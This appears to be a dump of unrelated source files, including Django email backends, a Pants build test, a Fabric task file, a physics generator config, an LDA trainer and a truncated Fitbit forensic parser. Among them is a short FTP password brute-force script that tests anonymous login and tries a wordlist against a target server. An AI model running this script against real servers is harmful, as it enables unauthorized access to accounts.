# Compute the ".."s needed to get from libdir to the prefix.
dotdots = ('..' + os.sep) * len (libdir.split (os.sep))
objfile = gdb.current_objfile ().filename
dir_ = os.path.join (os.path.dirname (objfile), dotdots, pythondir)
if not dir_ in sys.path:
sys.path.insert(0, dir_)
# Call a function as a plain import would not execute body of the included file
# on repeated reloads of this object file.
from libstdcxx.v6 import register_libstdcxx_printers
register_libstdcxx_printers(gdb.current_objfile())
|
[
"jczhang@bouffalolab.com"
] |
jczhang@bouffalolab.com
|
0d1bfe45270d76b88c774d848ede4a38ee8cb120
|
60364a7089bc359494a4a42ba6d79c2fd0b84185
|
/django_extended/emailing/backend.py
|
ced758319243991dd06e01a4e9d2d45cbf3c16e2
|
[
"BSD-3-Clause"
] |
permissive
|
dalou/django-extended
|
4936c77535bc4421a9f003da58a49629bc7996df
|
a7ba952ea7089cfb319b4615ae098579c9ab14f9
|
refs/heads/master
| 2021-10-27T09:33:28.615992
| 2015-12-14T14:55:33
| 2015-12-14T14:55:33
| 46,408,921
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,698
|
py
|
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.core.mail.backends.base import BaseEmailBackend
from django.core.mail.message import sanitize_address, DEFAULT_ATTACHMENT_MIME_TYPE
from django.core.mail.backends.smtp import EmailBackend
from .models import *
class DevBackend(EmailBackend):
def route_recipients(self, recipients):
for i,r in enumerate(recipients):
recipients[i] = "autrusseau.damien@gmail.com, adelineautrusseau@gmail.com"
return recipients
def _send(self, message):
        original_receivers = ", ".join(message.to)
message.to = self.route_recipients(message.to)
message.cc = self.route_recipients(message.cc)
message.bcc = self.route_recipients(message.bcc)
        message.subject += ' <original receivers : %s>' % original_receivers
super(DevBackend, self)._send(message)
class ProductionBackend(EmailBackend):
def route_recipients(self, recipients):
# if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
# receivers = ", ".join(list(set(TestEmail.objects.all().values_list('email', flat=True))))
# # for i,r in enumerate(recipients):
# # if not r.endswith('@%s' % PROJECT_DOMAIN):
# # recipients = settings.DEFAULT_FROM_EMAIL
return recipients
def _send(self, message):
# if getattr(settings, 'EMAIL_DOMAIN_ONLY', False):
# message.to = self.route_recipients(message.to)
# message.cc = self.route_recipients(message.cc)
# message.bcc = self.route_recipients(message.bcc)
super(ProductionBackend, self)._send(message)
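# How these backends might be enabled in settings.py (a sketch; the dotted
# path assumes the package is importable as 'django_extended'):
# EMAIL_BACKEND = 'django_extended.emailing.backend.DevBackend'         # dev/staging
# EMAIL_BACKEND = 'django_extended.emailing.backend.ProductionBackend'  # production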
|
[
"autrusseau.damien@gmail.com"
] |
autrusseau.damien@gmail.com
|
f51a2ebb6f85f0f5d06ee9ac9dd3373d5880f1d0
|
d17724b2ce056b435f57b16fb0cbea32e44a29c6
|
/Gun4PY/ftp-bruteforce.py
|
0f673dce18e4b54b0c7f64d8571451b8a5f6f497
|
[] |
no_license
|
UgurCIL/Examples
|
27264d89131b4aaff46f91705a03779c4e825ad6
|
c1722a519836a24c8a946380e6cbcd6da963f0c5
|
refs/heads/master
| 2020-04-24T15:28:17.288204
| 2019-02-22T13:30:35
| 2019-02-22T13:30:35
| 172,069,050
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,018
|
py
|
import sys
from ftplib import FTP
def checkAnonymous(dstIP):
    try:
        ftp = FTP(dstIP)
        ftp.login()
        print("[*] Anonymous login is enabled")
        print("[*] Username : anonymous")
        print("[*] Password : anonymous")
        ftp.close()
    except Exception:
        pass

def ftpLogin(dstIP, user, passw):
    try:
        ftp = FTP(dstIP)
        ftp.login(user, passw)
        ftp.quit()
        print("[!] Username/Password found.")
        print("[!] Username : " + user)
        print("[!] Password : " + passw)
        sys.exit(0)
    # catch Exception (not a bare except) so sys.exit() is not swallowed
    except Exception:
        pass

def bruteForce(dstIP, user, wordL):
    try:
        wordlist = open(wordL, "r")
        words = wordlist.readlines()
        for word in words:
            word = word.strip()
            ftpLogin(dstIP, user, word)
    except Exception:
        print("[-] No matching password found..")
        sys.exit(0)

dstIP = input("FTP server address : ")
user = input("Username : ")
wordlist = input("Password list : ")
bruteForce(dstIP, user, wordlist)
checkAnonymous(dstIP)
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
d14bf3bde060c5cda07a825296dee074f729f51f
|
5db0fab37c2b8a618d85d3b60fab9f806c416474
|
/src/python/pants/backend/go/util_rules/build_pkg_test.py
|
be4d1f7e5dab9561e76f8e82e785b6d2d8bc7090
|
[
"Apache-2.0"
] |
permissive
|
pantsbuild/pants
|
4988d1ac5474ec95f94ce2218aeb759401e4b011
|
98cbda8545f0d58c586ed2daa76fefd729d5e0d5
|
refs/heads/main
| 2023-09-05T03:44:17.646899
| 2023-09-01T19:52:09
| 2023-09-01T19:52:09
| 7,209,075
| 2,708
| 593
|
Apache-2.0
| 2023-09-14T19:33:33
| 2012-12-17T17:39:04
|
Python
|
UTF-8
|
Python
| false
| false
| 6,371
|
py
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os.path
from textwrap import dedent
import pytest
from pants.backend.go import target_type_rules
from pants.backend.go.target_types import GoModTarget
from pants.backend.go.util_rules import (
assembly,
build_pkg,
first_party_pkg,
go_mod,
import_analysis,
link,
sdk,
third_party_pkg,
)
from pants.backend.go.util_rules.build_opts import GoBuildOptions
from pants.backend.go.util_rules.build_pkg import (
BuildGoPackageRequest,
BuiltGoPackage,
FallibleBuiltGoPackage,
)
from pants.engine.fs import Snapshot
from pants.engine.rules import QueryRule
from pants.testutil.rule_runner import RuleRunner
from pants.util.strutil import path_safe
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*sdk.rules(),
*assembly.rules(),
*build_pkg.rules(),
*import_analysis.rules(),
*go_mod.rules(),
*first_party_pkg.rules(),
*link.rules(),
*third_party_pkg.rules(),
*target_type_rules.rules(),
QueryRule(BuiltGoPackage, [BuildGoPackageRequest]),
QueryRule(FallibleBuiltGoPackage, [BuildGoPackageRequest]),
],
target_types=[GoModTarget],
)
rule_runner.set_options([], env_inherit={"PATH"})
return rule_runner
def assert_built(
rule_runner: RuleRunner, request: BuildGoPackageRequest, *, expected_import_paths: list[str]
) -> None:
built_package = rule_runner.request(BuiltGoPackage, [request])
result_files = rule_runner.request(Snapshot, [built_package.digest]).files
expected = {
import_path: os.path.join("__pkgs__", path_safe(import_path), "__pkg__.a")
for import_path in expected_import_paths
}
assert dict(built_package.import_paths_to_pkg_a_files) == expected
assert sorted(result_files) == sorted(expected.values())
def test_build_pkg(rule_runner: RuleRunner) -> None:
transitive_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep/transitive",
pkg_name="transitive",
dir_path="dep/transitive",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"dep/transitive/f.go": dedent(
"""\
package transitive
func Quote(s string) string {
return ">>" + s + "<<"
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(),
minimum_go_version=None,
)
direct_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep",
pkg_name="dep",
dir_path="dep",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"dep/f.go": dedent(
"""\
package dep
import "example.com/foo/dep/transitive"
func Quote(s string) string {
return transitive.Quote(s)
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(transitive_dep,),
minimum_go_version=None,
)
main = BuildGoPackageRequest(
import_path="example.com/foo",
pkg_name="foo",
dir_path="",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"f.go": dedent(
"""\
package foo
import "example.com/foo/dep"
func main() {
dep.Quote("Hello world!")
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(direct_dep,),
minimum_go_version=None,
)
assert_built(
rule_runner, transitive_dep, expected_import_paths=["example.com/foo/dep/transitive"]
)
assert_built(
rule_runner,
direct_dep,
expected_import_paths=["example.com/foo/dep", "example.com/foo/dep/transitive"],
)
assert_built(
rule_runner,
main,
expected_import_paths=[
"example.com/foo",
"example.com/foo/dep",
"example.com/foo/dep/transitive",
],
)
def test_build_invalid_pkg(rule_runner: RuleRunner) -> None:
invalid_dep = BuildGoPackageRequest(
import_path="example.com/foo/dep",
pkg_name="dep",
dir_path="dep",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot({"dep/f.go": "invalid!!!"}).digest,
s_files=(),
direct_dependencies=(),
minimum_go_version=None,
)
main = BuildGoPackageRequest(
import_path="example.com/foo",
pkg_name="main",
dir_path="",
build_opts=GoBuildOptions(),
go_files=("f.go",),
digest=rule_runner.make_snapshot(
{
"f.go": dedent(
"""\
package main
import "example.com/foo/dep"
func main() {
dep.Quote("Hello world!")
}
"""
)
}
).digest,
s_files=(),
direct_dependencies=(invalid_dep,),
minimum_go_version=None,
)
invalid_direct_result = rule_runner.request(FallibleBuiltGoPackage, [invalid_dep])
assert invalid_direct_result.output is None
assert invalid_direct_result.exit_code == 1
assert (
invalid_direct_result.stdout
== "dep/f.go:1:1: syntax error: package statement must be first\n"
)
invalid_dep_result = rule_runner.request(FallibleBuiltGoPackage, [main])
assert invalid_dep_result.output is None
assert invalid_dep_result.exit_code == 1
assert (
invalid_dep_result.stdout == "dep/f.go:1:1: syntax error: package statement must be first\n"
)
|
[
"noreply@github.com"
] |
pantsbuild.noreply@github.com
|
f6bc336f85c826b416c7a82c6d5707a2e558c142
|
cad999eacee16dc0e001a57f50b5d8b0f4d4ebf6
|
/p202.py
|
a2cc8d0b585a2940e0c568ce938cd4db057be5f3
|
[] |
no_license
|
divyanarra0/pythonprogram
|
8694a41ba3b39eb44a94a693eac3f7f5f18b588b
|
10d8f59a472ccd4548771bad29be84a1a44854d8
|
refs/heads/master
| 2020-03-27T10:32:21.664657
| 2019-05-14T07:31:00
| 2019-05-14T07:31:00
| 146,427,260
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 723
|
py
|
def isVowel(c):
c = c.lower()
if (c == 'a' or c == 'e' or
c == 'i' or c == 'o' or c == 'u'):
return True
return False
# Function to return first X vowels
def firstXvowels(s, x):
# String to store first X vowels
result = ""
for i in range(0, len(s), 1):
# If s[i] is a vowel then
# append it to the result
if (isVowel(s[i])):
result += s[i]
# If the desired length is reached
if (len(result) == x):
return result
# If total vowels are < X
return "-1"
# Driver code
if __name__ == '__main__':
str = "asdaqrew"
x = 3
print(firstXvowels(str, x))
|
[
"noreply@github.com"
] |
divyanarra0.noreply@github.com
|
751cf05a4a081982c332d1d32c6bfbd742ac75f9
|
40ca01569e9c8ed6d2312447fac604229bdeace3
|
/fabfile.py
|
bb0342de308a2dc2d08064b855fa24d83163edb7
|
[
"MIT"
] |
permissive
|
deniskrumko/izyan-poker
|
c393c9c4cb401d3180a97075fde59ff2e371a77d
|
ce70c9c8f761409adad289809e5220237b312407
|
refs/heads/master
| 2021-06-14T08:59:03.364660
| 2020-02-11T06:48:00
| 2020-02-11T06:48:00
| 200,377,031
| 7
| 2
|
MIT
| 2021-06-10T18:43:43
| 2019-08-03T13:11:06
|
Python
|
UTF-8
|
Python
| true
| false
| 3,424
|
py
|
from fabric.api import task, local
def print_msg(msg, error=False):
"""Print message in console."""
def green_msg(msg):
"""Make message green color in console."""
return '\033[92m{0}\033[00m'.format(msg)
def red_msg(msg):
"""Make message red color in console."""
return '\033[91m{0}\033[00m'.format(msg)
print_function = red_msg if error else green_msg
print(print_function('\n{}\n'.format(msg)))
# MAIN COMMANDS
# ============================================================================
@task
def manage(command):
"""Run ``python3 manage.py`` command."""
return local('python3 manage.py {}'.format(command))
@task
def run():
"""Run server."""
return manage('runserver')
@task
def shell():
"""Run server."""
return manage('shell_plus')
# GIT
# ============================================================================
@task
def push(force=False):
"""Push changes to all servers."""
force = ' --force' if force else ''
print_msg('1. Pushing to origin')
local(f'git push origin master --tags{force}')
print_msg('2. Pushing to Heroku')
local(f'git push heroku master{force}')
# LOCALES
# ============================================================================
@task
def makemessages():
"""Make messages."""
return manage('makemessages -l ru --no-location')
@task
def compilemessages():
"""Compile messages."""
return manage('compilemessages')
# MIGRATIONS AND DATABASE
# ============================================================================
@task
def makemigrations():
"""Make migrations for database."""
manage('makemigrations')
@task
def migrate():
"""Apply migrations to database."""
print_msg('Applying migrations')
manage('migrate')
@task
def createsuperuser(email='root@root.ru'):
"""Create superuser with default credentials."""
print_msg('Creating superuser')
return manage('createsuperuser --username root --email {}'.format(email))
@task
def resetdb():
"""Reset database to initial state."""
print_msg('Remove "scr/media" folder')
local('rm -rf media/')
print_msg('Reset database')
manage('reset_db -c --noinput')
migrate()
createsuperuser()
# STATIC CHECKS: ISORT AND PEP8
# ============================================================================
@task
def isort():
"""Fix imports formatting."""
print_msg('Running imports fix')
local('isort apps config -y -rc')
@task
def pep8(path='apps core'):
"""Check PEP8 errors."""
print_msg('Checking PEP8 errors')
return local('flake8 --config=.flake8 {}'.format(path))
# PIPENV
# ============================================================================
@task
def lock():
"""Lock requirements."""
print_msg('Locking requirements')
local('pipenv lock')
@task
def install():
"""Install requirements."""
print_msg('Installing DEV requirements')
local('pipenv install --dev')
# HEROKU
# ============================================================================
@task
def logs():
local('heroku logs --source app --tail')
@task
def scale(value=1):
local(f'heroku ps:scale web={value}')
@task
def ps():
local(f'heroku ps')
@task
def runweb():
local(f'heroku local web -f Procfile.local')
@task
def python(command):
local(f'heroku run python {command}')
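# Typical invocations (a sketch; assumes Fabric 1.x, whose CLI passes task
# arguments after a colon):
#   fab run                # start the dev server
#   fab push:force=True    # force-push master to origin and Heroku
#   fab resetdb            # drop media/, reset the DB, recreate the superuser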
|
[
"dkrumko@gmail.com"
] |
dkrumko@gmail.com
|
4fd52351a670070b2a03c71c3135823c46cdb129
|
4526ed71f39d70111c3787ec90b4932a183c452c
|
/2016/Pyquen_WToMuNu_TuneZ2_8160GeV_pythia6_reverse_cfi.py
|
f47777dec69a0a32fa2aa7721bb9c36a5c2f145d
|
[] |
no_license
|
CMS-HIN-dilepton/MCRequest
|
773f414739efc529dc957a044232478b1c4f1c03
|
ff49d22fde2c4a006fe7fa02d4cf53d794f91888
|
refs/heads/master
| 2021-05-02T12:16:51.891664
| 2020-06-20T18:35:52
| 2020-06-20T18:35:52
| 45,127,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,712
|
py
|
import FWCore.ParameterSet.Config as cms
from Configuration.Generator.PythiaUEZ2Settings_cfi import *
generator = cms.EDFilter("PyquenGeneratorFilter",
comEnergy = cms.double(8160.0),
aBeamTarget = cms.double(208.0),
protonSide = cms.untracked.int32(2),
qgpInitialTemperature = cms.double(1.0), ## initial temperature of QGP; allowed range [0.2,2.0]GeV;
qgpProperTimeFormation = cms.double(0.1), ## proper time of QGP formation; allowed range [0.01,10.0]fm/c;
hadronFreezoutTemperature = cms.double(0.14),
doRadiativeEnLoss = cms.bool(True), ## if true, perform partonic radiative en loss
doCollisionalEnLoss = cms.bool(False),
qgpNumQuarkFlavor = cms.int32(0), ## number of active quark flavors in qgp; allowed values: 0,1,2,3
numQuarkFlavor = cms.int32(0), ## to be removed
doIsospin = cms.bool(True),
angularSpectrumSelector = cms.int32(0), ## angular emitted gluon spectrum :
embeddingMode = cms.bool(False),
backgroundLabel = cms.InputTag("generator"), ## ineffective in no mixing
doQuench = cms.bool(False),
bFixed = cms.double(0.0), ## fixed impact param (fm); valid only if cflag_=0
cFlag = cms.int32(0), ## centrality flag
bMin = cms.double(0.0), ## min impact param (fm); valid only if cflag_!=0
bMax = cms.double(0.0), ## max impact param (fm); valid only if cflag_!=0
pythiaPylistVerbosity = cms.untracked.int32(1),
pythiaHepMCVerbosity = cms.untracked.bool(True),
maxEventsToPrint = cms.untracked.int32(0),
PythiaParameters = cms.PSet(pythiaUESettingsBlock,
processParameters = cms.vstring('MSEL = 0 !User defined processes',
'MSUB(2) = 1 !W production',
'MDME(190,1) = 0 !W decay into dbar u',
'MDME(191,1) = 0 !W decay into dbar c',
'MDME(192,1) = 0 !W decay into dbar t',
'MDME(194,1) = 0 !W decay into sbar u',
'MDME(195,1) = 0 !W decay into sbar c',
'MDME(196,1) = 0 !W decay into sbar t',
'MDME(198,1) = 0 !W decay into bbar u',
'MDME(199,1) = 0 !W decay into bbar c',
'MDME(200,1) = 0 !W decay into bbar t',
'MDME(205,1) = 0 !W decay into bbar tp',
'MDME(206,1) = 0 !W decay into e+ nu_e',
'MDME(207,1) = 1 !W decay into mu+ nu_mu',
'MDME(208,1) = 0 !W decay into tau+ nu_tau'),
parameterSets = cms.vstring('pythiaUESettings',
'processParameters')
)
)
configurationMetadata = cms.untracked.PSet(
version = cms.untracked.string('$Revision: 1.1 $'),
name = cms.untracked.string('$Source: /cvs_server/repositories/CMSSW/CMSSW/Configuration/GenProduction/python/HI/Pyquen_WToMuNu_TuneZ2_5023GeV_pythia6_cfi.py,v $'),
annotation = cms.untracked.string('PYQUEN-Wmunu Tune Z2 at 5.023 TeV')
)
#ProductionFilterSequence = cms.Sequence(hiSignal)
ProductionFilterSequence = cms.Sequence(generator)
|
[
"emilien.chapon@cern.ch"
] |
emilien.chapon@cern.ch
|
b05505c9b445af3674a860fe8d4fd78dda734376
|
b9cd1b9758e58f00335900fd120e1d47c23600ce
|
/tests/test_pipeline_chipseq.py
|
543d39616238213767af72ed8a467fa36a735e65
|
[
"Apache-2.0"
] |
permissive
|
Multiscale-Genomics/mg-process-fastq
|
4fb7fef68526237f06312a3f137df031a448731c
|
50c7115c0c1a6af48dc34f275e469d1b9eb02999
|
refs/heads/master
| 2020-04-12T06:46:01.100270
| 2018-11-19T16:05:03
| 2018-11-19T16:05:03
| 64,320,140
| 2
| 4
|
Apache-2.0
| 2018-11-16T16:54:54
| 2016-07-27T15:29:25
|
Python
|
UTF-8
|
Python
| false
| false
| 7,060
|
py
|
"""
.. See the NOTICE file distributed with this work for additional information
regarding copyright ownership.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function
import os.path
import pytest
from basic_modules.metadata import Metadata
from process_chipseq import process_chipseq
@pytest.mark.chipseq
@pytest.mark.pipeline
def test_chipseq_pipeline_00():
"""
Test case to ensure that the ChIP-seq pipeline code works.
Running the pipeline with the test data from the command line:
.. code-block:: none
runcompss \\
--lang=python \\
--library_path=${HOME}/bin \\
--pythonpath=/<pyenv_virtenv_dir>/lib/python2.7/site-packages/ \\
--log_level=debug \\
process_chipseq.py \\
--taxon_id 9606 \\
--genome /<dataset_dir>/Human.GCA_000001405.22.fasta \\
--assembly GRCh38 \\
--file /<dataset_dir>/DRR000150.22.fastq
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
files = {
'genome': resource_path + 'macs2.Human.GCA_000001405.22.fasta',
'loc': resource_path + 'macs2.Human.DRR000150.22.fastq',
'index': resource_path + 'macs2.Human.GCA_000001405.22.fasta.bwa.tar.gz'
}
metadata = {
"genome": Metadata(
"Assembly", "fasta", files['genome'], None,
{'assembly': 'GCA_000001405.22'}),
"loc": Metadata(
"data_chip_seq", "fastq", files['loc'], None,
{'assembly': 'GCA_000001405.22'}
),
"index": Metadata(
"Index", "bwa_index", files['index'], files['genome'],
{'assembly': 'GCA_000001405.22', "tool": "bwa_indexer"}),
}
root_name = files['loc'].split("/")
root_name[-1] = root_name[-1].replace('.fastq', '')
files_out = {
"bam": files['loc'].replace(".fastq", ".bam"),
"bai": files['loc'].replace(".fastq", ".bai"),
"filtered": files['loc'].replace(".fastq", "_filtered.bam"),
"output": files['loc'].replace(".fastq", ".tsv"),
'narrow_peak': '/'.join(root_name) + '_filtered_peaks.narrowPeak',
'summits': '/'.join(root_name) + '_filtered_summits.bed',
'broad_peak': '/'.join(root_name) + '_filtered_peaks.broadPeak',
'gapped_peak': '/'.join(root_name) + '_filtered_peaks.gappedPeak'
}
chipseq_handle = process_chipseq({"macs_nomodel_param": True, "execution": resource_path})
chipseq_files, chipseq_meta = chipseq_handle.run(files, metadata, files_out) # pylint: disable=unused-variable
print(chipseq_files)
# Add tests for all files created
for f_out in chipseq_files:
print("CHIP-SEQ RESULTS FILE:", f_out)
# assert chipseq_files[f_out] == files_out[f_out]
assert os.path.isfile(chipseq_files[f_out]) is True
assert os.path.getsize(chipseq_files[f_out]) > 0
try:
os.remove(chipseq_files[f_out])
except OSError as ose:
print("Error: %s - %s." % (ose.filename, ose.strerror))
@pytest.mark.chipseq
@pytest.mark.pipeline
def test_chipseq_pipeline_01():
"""
Test case to ensure that the ChIP-seq pipeline code works.
Running the pipeline with the test data from the command line:
.. code-block:: none
runcompss \\
--lang=python \\
--library_path=${HOME}/bin \\
--pythonpath=/<pyenv_virtenv_dir>/lib/python2.7/site-packages/ \\
--log_level=debug \\
process_chipseq.py \\
--taxon_id 9606 \\
--genome /<dataset_dir>/Human.GCA_000001405.22.fasta \\
--assembly GRCh38 \\
--file /<dataset_dir>/DRR000150.22.fastq
"""
resource_path = os.path.join(os.path.dirname(__file__), "data/")
files = {
'genome_public': resource_path + 'macs2.Human.GCA_000001405.22.fasta',
'loc': resource_path + 'macs2.Human.DRR000150.22.fastq',
'index_public': resource_path + 'macs2.Human.GCA_000001405.22.fasta.bwa.tar.gz'
}
metadata = {
"genome_public": Metadata(
"Assembly", "fasta", files['genome_public'], None,
{'assembly': 'GCA_000001405.22'}),
"loc": Metadata(
"data_chip_seq", "fastq", files['loc'], None,
{'assembly': 'GCA_000001405.22'}
),
"index_public": Metadata(
"Index", "bwa_index", files['index_public'], files['genome_public'],
{'assembly': 'GCA_000001405.22', "tool": "bwa_indexer"}),
}
root_name = files['loc'].split("/")
root_name[-1] = root_name[-1].replace('.fastq', '')
files_out = {
"bam": files['loc'].replace(".fastq", ".bam"),
"bai": files['loc'].replace(".fastq", ".bai"),
"filtered": files['loc'].replace(".fastq", "_filtered.bam"),
"output": files['loc'].replace(".fastq", ".tsv"),
'narrow_peak': '/'.join(root_name) + '_filtered_peaks.narrowPeak',
'summits': '/'.join(root_name) + '_filtered_summits.bed',
'broad_peak': '/'.join(root_name) + '_filtered_peaks.broadPeak',
'gapped_peak': '/'.join(root_name) + '_filtered_peaks.gappedPeak'
}
chipseq_handle = process_chipseq({"macs_nomodel_param": True, "execution": resource_path})
chipseq_files, chipseq_meta = chipseq_handle.run(files, metadata, files_out) # pylint: disable=unused-variable
print(chipseq_files)
# Add tests for all files created
for f_out in chipseq_files:
print("CHIP-SEQ RESULTS FILE:", f_out)
# assert chipseq_files[f_out] == files_out[f_out]
assert os.path.isfile(chipseq_files[f_out]) is True
assert os.path.getsize(chipseq_files[f_out]) > 0
try:
os.remove(chipseq_files[f_out])
except OSError as ose:
print("Error: %s - %s." % (ose.filename, ose.strerror))
|
[
"mark.mcdowall@gmail.com"
] |
mark.mcdowall@gmail.com
|
c4e2b115dbe1fb2ca6e5626b223b88a4f3dde73e
|
b0e67fbd4c42aba24f7d4bccb99e9aa037c0b7d5
|
/lda/train_LDA.py
|
39ade7589cc4a9b7f6176b106691125a03142547
|
[] |
no_license
|
gombru/SocialMediaWeakLabeling
|
f979aea8218be115758ff8e1e9a945a701ac99b9
|
518437903ba7370a4098303a41196a08f1d6a58e
|
refs/heads/master
| 2022-02-26T17:49:08.997335
| 2022-02-10T12:54:57
| 2022-02-10T12:54:57
| 84,461,511
| 15
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,004
|
py
|
# Trains and saves an LDA model with the given text files.
from nltk.tokenize import RegexpTokenizer
from stop_words import get_stop_words
from nltk.stem.porter import PorterStemmer
from gensim import corpora, models
import glob
import string
import random
import numpy as np
whitelist = string.ascii_letters + string.digits + ' '  # string.letters was removed in Python 3
instagram_text_data_path = '../../../datasets/SocialMedia/captions_resized_1M/cities_instagram/'
model_path = '../../../datasets/SocialMedia/models/LDA/lda_model_cities_instagram_1M_500_5000chunck.model'
words2filter = ['rt','http','t','gt','co','s','https','http','tweet','markars_','photo','pictur','picture','say','photo','much','tweet','now','blog']
cities = ['london','newyork','sydney','losangeles','chicago','melbourne','miami','toronto','singapore','sanfrancisco']
num_topics = 500
threads = 8
passes = 1 #Passes over the whole corpus
chunksize = 5000 #Update the model every 5000 documents
# See https://radimrehurek.com/gensim/wiki.html
update_every = 1
repetition_threshold = 20
#Initialize Tokenizer
tokenizer = RegexpTokenizer(r'\w+')
# create English stop words list
en_stop = get_stop_words('en')
# add own stop words
for w in words2filter:
en_stop.append(w)
# Create p_stemmer of class PorterStemmer
p_stemmer = PorterStemmer()
posts_text = []
texts = [] #List of lists of tokens
# -- LOAD DATA FROM INSTAGRAM --
for city in cities:
print "Loading data from " + city
for file_name in glob.glob(instagram_text_data_path + city + "/*.txt"):
caption = ""
filtered_caption = ""
file = open(file_name, "r")
for line in file:
caption = caption + line
# Replace hashtags with spaces
caption = caption.replace('#', ' ')
# Keep only letters and numbers
for char in caption:
if char in whitelist:
filtered_caption += char
        posts_text.append(filtered_caption.lower())
        # print(filtered_caption)
print "Number of posts: " + str(len(posts_text))
print "Creating tokens"
c= 0
for t in posts_text:
c += 1
if c % 10000 == 0:
print c
try:
t = t.lower()
tokens = tokenizer.tokenize(t)
# remove stop words from tokens
stopped_tokens = [i for i in tokens if not i in en_stop]
# stem token
text = [p_stemmer.stem(i) for i in stopped_tokens]
        # add processed text to list of lists
texts.append(text)
except:
continue
# TODO: drop processed elements from the list if memory becomes a limitation
# del tweets_text[0]
posts_text = []
# Remove words that appear less than N times
print "Removing words appearing less than: " + str(repetition_threshold)
from collections import defaultdict
frequency = defaultdict(int)
for text in texts:
for token in text:
frequency[token] += 1
texts = [[token for token in text if frequency[token] > repetition_threshold] for text in texts]
# Construct a document-term matrix to understand how frequently each term occurs within each document
# The Dictionary() function traverses texts, assigning a unique integer id to each unique token while also collecting word counts and relevant statistics.
# To see each token unique integer id, try print(dictionary.token2id)
dictionary = corpora.Dictionary(texts)
print(dictionary)
# TODO check this
# dictionary.compactify()
# Filter out tokens that appear in less than no_below documents (absolute number) or more than no_above documents (fraction of total corpus size, not absolute number).
# after (1) and (2), keep only the first keep_n most frequent tokens (or keep all if None).
# dictionary.filter_extremes(no_below=no_below, no_above=no_above, keep_n=None)
# dictionary.compactify() # remove gaps in id sequence after words that were removed
# Convert dictionary to a BoW
# The result is a list of vectors equal to the number of documents. Each document contains tuples (term ID, term frequency)
corpus = [dictionary.doc2bow(text) for text in texts]
texts = []
#Randomize training elements
corpus = np.random.permutation(corpus)
# Generate an LDA model
print "Creating LDA model"
# the minimum_probability=0 argument is necessary in order for
# gensim to return the full document-topic-distribution matrix. If
# this argument is omitted and left to the gensim default of 0.01,
# then all document-topic weights below that threshold will be
# returned as NaN, violating the subsequent LDAvis assumption that
# all rows (documents) in the document-topic-distribution matrix sum
# to 1.
#ldamodel = models.ldamodel.LdaModel(corpus, num_topics=num_topics, id2word = dictionary, passes=passes, minimum_probability=0)
ldamodel = models.LdaMulticore(corpus, num_topics=num_topics, id2word = dictionary, chunksize=chunksize, passes=passes, workers=threads, minimum_probability=0)
ldamodel.save(model_path)
# Our LDA model is now stored as ldamodel
print(ldamodel.print_topics(num_topics=8, num_words=10))
print "DONE"
|
[
"raulgombru@gmail.com"
] |
raulgombru@gmail.com
|
09b194ff61b3e409331b5fb117555aaaa998c26a
|
52b5773617a1b972a905de4d692540d26ff74926
|
/.history/find_max_20200722114432.py
|
63139ffb63e0f85ee0899b804e0ff82130382654
|
[] |
no_license
|
MaryanneNjeri/pythonModules
|
56f54bf098ae58ea069bf33f11ae94fa8eedcabc
|
f4e56b1e4dda2349267af634a46f6b9df6686020
|
refs/heads/master
| 2022-12-16T02:59:19.896129
| 2020-09-11T12:05:22
| 2020-09-11T12:05:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 190
|
py
|
items = [6,20,8,19,56,23,87,41,49,53]
def find_max(items):
    # Breaking condition
    if len(items) == 1:
        return items[0]
    op1 = items[0]
    op2 = find_max(items[1:])
    # Return the larger of the first element and the max of the rest
    return op1 if op1 > op2 else op2

print(find_max(items))  # prints 87
|
[
"mary.jereh@gmail.com"
] |
mary.jereh@gmail.com
|
907769470c06a9adb96a73b04f9ea62d43e0d19c
|
0ee4debe412b996de7f5a592800515ae7104c5a5
|
/scripts/artifacts/fitbitHeart.py
|
6710cc413d11222ce7d902507ea13b4b8ec52313
|
[
"MIT"
] |
permissive
|
kibaffo33/ALEAPP
|
af7eebd9d4ab078c57c4108ebab0c80c89df8630
|
ca50b7d665dccb846ff601b7b797d754eb8100d9
|
refs/heads/master
| 2022-06-15T03:55:37.407875
| 2022-06-13T20:39:47
| 2022-06-13T20:39:47
| 243,058,738
| 1
| 0
| null | 2020-02-25T17:29:43
| 2020-02-25T17:29:36
| null |
UTF-8
|
Python
| false
| false
| 1,477
|
py
|
import sqlite3
import textwrap
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows, open_sqlite_db_readonly
def get_fitbitHeart(files_found, report_folder, seeker, wrap_text):
file_found = str(files_found[0])
db = open_sqlite_db_readonly(file_found)
cursor = db.cursor()
cursor.execute('''
SELECT
datetime("DATE_TIME"/1000, 'unixepoch'),
AVERAGE_HEART_RATE,
RESTING_HEART_RATE
FROM HEART_RATE_DAILY_SUMMARY
